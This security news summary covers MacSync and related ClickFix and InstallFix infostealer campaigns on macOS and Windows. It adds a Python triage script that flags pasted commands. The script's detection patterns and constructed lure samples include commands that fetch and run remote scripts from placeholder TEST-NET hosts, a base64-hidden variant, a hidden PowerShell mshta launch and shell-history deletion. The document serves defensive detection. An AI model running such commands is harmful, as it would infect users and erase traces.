MacSync, a macOS information stealer, is being distributed through three separate ClickFix campaigns that trick users into running malicious terminal commands. Researchers at Sophos — Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey — identified the campaigns, noting the method “relies entirely on user interaction” rather than technical exploits.
Whether the three campaigns share a single threat actor remains unknown. Jamf Threat Labs flagged similar ClickFix lures distributing the same malware back in December 2025.
Once a victim runs the terminal command, a shell script contacts a hard-coded server to retrieve an AppleScript payload — the actual infostealer — while simultaneously wiping traces of the intrusion. The stealer harvests credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.
A Widening Attack Surface
According to the Sophos researchers, the most recent variant “likely represents the malware developer adjusting to OS and software security measures to maintain effectiveness.” The lures now trade on the perceived legitimacy of ChatGPT conversations to convince targets to execute commands.
Separate campaigns, labeled InstallFix or GoogleFix, have used legitimate platforms including Cloudflare Pages, Squarespace, and Tencent EdgeOne to host fake installation instructions for developer tools such as Anthropic's Claude Code. Malicious search engine ads drive traffic to the URLs.
On Windows, this infection chain deploys the Alien infostealer. On macOS, it drops Atomic Stealer, according to Nati Tal, head of Guardio Labs. The PowerShell command fetches a legitimate Chrome extension package bundled inside a malicious HTML Application (HTA) file, which then launches an obfuscated .NET loader for Alien directly in memory.
Push Security noted a key distinction: unlike standard ClickFix attacks that manufacture a fake CAPTCHA or error message to justify running a command, InstallFix requires no such pretext. “The pretext is simply the user wanting to install legit software.”
AI Tools as a Preferred Target
Researchers at Pillar Security counted at least 20 distinct malware campaigns targeting AI and vibe coding tools between February and March 2026. Targets span code editors, AI agents, large language model platforms, AI-powered browser extensions, AI video generators, and AI business tools.
Of those 20 campaigns, nine hit both Windows and macOS. Seven targeted macOS exclusively.
Pillar Security researcher Eilon Cohen explained the skew directly: “AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials — SSH keys, cloud tokens, cryptocurrency wallets.” The curl | sh installation pattern used by tools like Homebrew, Rust, and nvm gives malicious commands natural cover.
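The traits the reporting above attributes to these lures (a remote fetch piped straight into a shell, a base64 blob hiding the real command, an AppleScript payload run through osascript, and on Windows a hidden PowerShell launching an HTA) can be turned into a triage check for commands a user is about to paste, or for commands recovered from shell history during an investigation. The script below is an added example written for this summary, not code from Sophos, Jamf, Guardio, Push Security or Pillar Security. The rule names and weights, the installer-host allowlist, the shell-history cleanup pattern and every sample command are this example's own constructions; the lure samples point at TEST-NET addresses and are not real indicators. It decodes embedded base64 and rescans the result so that an obfuscated `curl | sh` is scored the same as a plain one, and it deliberately treats a bare fetch-to-shell from a known installer host as the Homebrew/rustup idiom rather than as an attack, which is exactly the cover the campaigns exploit.

```python
"""Triage pasted 'fix' commands for ClickFix traits.

Added example for this article, not code from Sophos, Jamf, Guardio,
Push Security or Pillar Security. Rule names, weights, the installer
allowlist and every sample command are this example's own constructions.
"""
import base64
import re
from urllib.parse import urlparse

# Traits drawn from the campaigns described above: a remote fetch piped
# straight into a shell (the curl | sh idiom that gives these lures cover),
# a base64 blob hiding the real command, an AppleScript payload run through
# osascript, and on Windows a hidden/encoded PowerShell that launches an HTA.
RULES = [
    ("pipe_to_shell", 3, re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("cmd_subst_to_shell", 3, re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b")),
    ("base64_decode", 2, re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("osascript", 2, re.compile(r"\bosascript\b")),
    ("powershell_hidden_or_encoded", 3, re.compile(
        r"powershell(\.exe)?\b[^\n]*(-enc\w*|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring)",
        re.I)),
    ("hta_launch", 2, re.compile(r"\bmshta(\.exe)?\b|\.hta\b", re.I)),
    # The article says the macOS script wipes traces but not how; this
    # shell-history cleanup idiom is an assumed, not observed, pattern.
    ("history_cleanup", 2, re.compile(r"\brm\s+-r?f?\s+\S*\.(bash|zsh)_history|\bhistory\s+-c\b")),
]

# Demo allowlist (assumption): hosts the Homebrew and rustup installers fetch
# from. Matching it only downgrades a lone fetch-to-shell, nothing more.
KNOWN_INSTALLER_HOSTS = {"raw.githubusercontent.com", "sh.rustup.rs"}
URL_RE = re.compile(r"https?://[^\s\"'|)]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_layers(command):
    """Yield the command itself plus any base64 blob in it that decodes to text."""
    yield command
    for blob in B64_RE.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            yield text


def triage(command):
    """Return a verdict plus the evidence behind it for one pasted command."""
    layers = list(decoded_layers(command))
    hits = [name for name, _, rx in RULES if any(rx.search(layer) for layer in layers)]
    score = sum(w for name, w, _ in RULES if name in hits)
    hosts = {urlparse(u).hostname for layer in layers for u in URL_RE.findall(layer)}
    unknown = sorted(h for h in hosts if h and h not in KNOWN_INSTALLER_HOSTS)
    if not hits:
        verdict = "clean"
    elif set(hits) <= {"pipe_to_shell", "cmd_subst_to_shell"}:
        # A bare fetch-to-shell is exactly how Homebrew and rustup install, so
        # it is only escalated when the source host is not on the allowlist.
        verdict = "review" if unknown else "likely_installer"
    elif score >= 4:
        verdict = "block"
    else:
        verdict = "review"
    return {"verdict": verdict, "hits": hits, "score": score, "unknown_hosts": unknown}


# Constructed samples: two genuine installer idioms, three ClickFix-style
# lures pointing at TEST-NET addresses, and one benign command.
SAMPLES = {
    "homebrew": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "rustup": "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh",
    "mac_lure": "curl -s http://203.0.113.5/i.sh | sh; osascript /tmp/p.scpt; rm -f ~/.zsh_history",
    "mac_lure_b64": "echo %s | base64 -d | bash"
        % base64.b64encode(b"curl -fsSL http://203.0.113.5/i.sh | sh").decode(),
    "win_lure": 'powershell -w hidden -c "mshta http://203.0.113.9/setup.hta"',
    "benign": "git clone https://github.com/example/repo.git",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        r = triage(cmd)
        print(f"{label:13} {r['verdict']:16} hits={r['hits']} unknown={r['unknown_hosts']}")
```

Two caveats follow from the article itself. The allowlist is a weak signal, because the InstallFix pages are hosted on legitimate platforms and a lure can fetch its script from any host a user would trust; the verdict for a lone fetch-to-shell from an allowlisted host is "likely_installer", not "safe". And a "review" verdict on an obfuscated or unknown-host command is the useful output here: the point is to stop the user before the paste, since, as Sophos noted, the chain otherwise needs no exploit at all.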
The same social engineering blueprint has been adopted by a malicious traffic distribution system called KongTuke — also tracked as 404 TDS, Chaya_002, LandUpdate808, and TAG-124. It injects malicious JavaScript into compromised WordPress sites, prompting users to run a PowerShell command that triggers a multi-stage infection chain to deploy a Python-based trojan called ModeloRAT.
This article is a curated summary based on third-party sources.